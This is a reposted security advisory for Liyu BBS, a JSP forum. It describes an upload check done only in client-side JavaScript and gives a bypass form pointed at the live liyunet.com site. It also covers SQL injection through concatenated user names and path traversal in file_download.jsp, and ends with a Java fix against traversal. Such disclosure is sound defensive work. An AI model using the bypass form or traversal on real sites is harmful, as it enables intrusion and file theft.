[Repost] 鲤鱼bbs (Liyu BBS) vulnerabilities
Author: superhei [Note: all .class file code below was recovered with the decompiler 'Java源代码反编译专家']
1. Arbitrary file upload vulnerability in reg_upload.jsp
...
<HEAD>
<SCRIPT language="JavaScript" type="text/javascript">
function upload()
{
var filename = document.mainform.file.value;
filename = filename.toLowerCase();
var accept = false;
accept |= (filename.indexOf('.jpg')>-1);
accept |= (filename.indexOf('.jpeg')>-1);
accept |= (filename.indexOf('.bmp')>-1);
accept |= (filename.indexOf('.gif')>-1);
if(!accept)
{
alert("请选择图形文件!");
document.mainform.file.focus();
return false;
}
return true;
}
</SCRIPT>
<%
String StrLoad = request.getParameter("upload");
String TempName = "", errMsg = "";
try{
if((StrLoad!=null)&&(StrLoad.equals("up"))){
mySmartUpload.initialize(pageContext);
mySmartUpload.setTotalMaxFileSize(30000);
mySmartUpload.upload();
.......
The extension check is done only in client-side JavaScript, so it can be bypassed by building a local submit page: exp.htm
<FORM action="http://www.liyunet.com/bbs/reg_upload.jsp?upload=up" enctype="multipart/form-data" method="post" name="mainform" onsubmit="return upload();">
<input name="file" size=20 type="file" value="">
<input type="submit" value="确定">
</FORM>
After a successful upload, view the source of the returned page to see the name of the stored file.
2. SQL injection through multiple String parameters
Compared with PHP, JSP has no global security switch setting, so a ' can be used directly and the range of injectable statements is wider; update statements and the like are easy to inject as well.
Numeric parameters all go through getInt(), so there is little opportunity there, but string parameters are not filtered at all. For example:
in dispuser.jsp:
<%
try{
String searchUserName=ParamUtil.getString(request,"name");
User user=UserManager.findUser(searchUserName);
%>
The code of UserManager.findUser: [\WEB-INF\classes\com\bcxy\bbs\forum\UserManager.class]
......
public static User findUser(String userName)
throws UserNotFoundException, Exception
{
try
{
SqlQuery rs = new SqlQuery("select * from User where UserName like '" + userName + "'");
if(rs.next())
.......
Other instances are not listed here.
3. Arbitrary file download vulnerability in file_download.jsp
<%
String rDownFile = com.bcxy.bbs.util.ParamUtil.getString(request, "filename", "");
String downFile = "/WEB-INF/upload/" + rDownFile;
//
try{
com.bcxy.upload.SmartUpload mySmartUpload = new com.bcxy.upload.SmartUpload();
mySmartUpload.initialize(pageContext);
mySmartUpload.setContentDisposition(null);
mySmartUpload.downloadFile(downFile);
}catch(Exception e){
e.printStackTrace();
out.println("下载出错,请与管理员联系!");
}
%>
The filename parameter is not filtered.
mySmartUpload.downloadFile() lives in WEB-INF\classes\com\bcxy\upload\SmartUpload.class; its code is not pasted here, but it does not filter .. / \ either.
Exploitation example: http://www.liyunet.com/bbs/file_dow...le_download.jsp
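How the filename check in file_download.jsp could be hardened, as an added example written for this post rather than code from the BBS; the base directory follows the page's /WEB-INF/upload/, while the class name and the demo files are constructed.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;

// Added example, not the BBS's own code: a guard file_download.jsp
// could apply to "filename" before handing it to downloadFile().
// The base directory mirrors the page's "/WEB-INF/upload/"; the class
// name and the demo files below are constructed for illustration.
public final class SafeDownload {

    /**
     * Returns the requested file only if it is a plain name (no path
     * separators, not "." or "..") and, after canonicalisation, still
     * resolves inside uploadDir. Everything else yields null, which the
     * caller should turn into a 404 rather than a stack trace.
     */
    public static File resolve(File uploadDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            return null;
        }
        // First gate: reject any attempt to name a directory component.
        if (requested.indexOf('/') >= 0 || requested.indexOf('\\') >= 0
                || requested.equals(".") || requested.equals("..")) {
            return null;
        }
        // Second gate: canonical paths resolve symlinks and "..", so a
        // file that escapes the base by any route fails the prefix test.
        File base = uploadDir.getCanonicalFile();
        File candidate = new File(base, requested).getCanonicalFile();
        String basePrefix = base.getPath() + File.separator;
        if (!candidate.getPath().startsWith(basePrefix)) {
            return null;
        }
        return candidate.isFile() ? candidate : null;
    }

    // Constructed demo: a temporary upload directory holding one image.
    public static void main(String[] args) throws IOException {
        File dir = Files.createTempDirectory("upload").toFile();
        File avatar = new File(dir, "avatar.jpg");
        Files.createFile(avatar.toPath());
        String[] probes = {"avatar.jpg", "../outside.txt", "..\\outside.txt",
                           "/outside.txt", "missing.gif"};
        for (String p : probes) {
            System.out.println(p + " -> " + resolve(dir, p));
        }
    }
}
```

The same canonical-path comparison applies to the upload side: deciding on the server where a file lands and what it is named removes the dependence on the client-side extension check in reg_upload.jsp.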